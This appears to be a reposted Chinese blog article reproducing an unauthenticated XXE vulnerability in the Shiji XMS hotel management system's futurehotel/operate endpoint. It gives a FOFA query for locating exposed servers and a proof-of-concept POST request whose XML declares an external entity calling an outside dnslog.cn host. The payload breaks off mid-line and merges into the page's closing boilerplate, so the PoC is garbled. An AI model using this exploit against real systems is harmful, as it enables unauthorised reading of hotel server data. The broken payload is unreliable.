本文主要是介绍西软云XMS futurehotel/operate XXE漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 产品简介
西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。
0x02 漏洞复现
西软云XMS /XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
0x03 复现环境
FOFA:app="shiji-西软云XMS"
0x04 漏洞复现
PoC
POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://xxx.dnslog.cn"> 这篇关于西软云XMS futurehotel/operate XXE漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
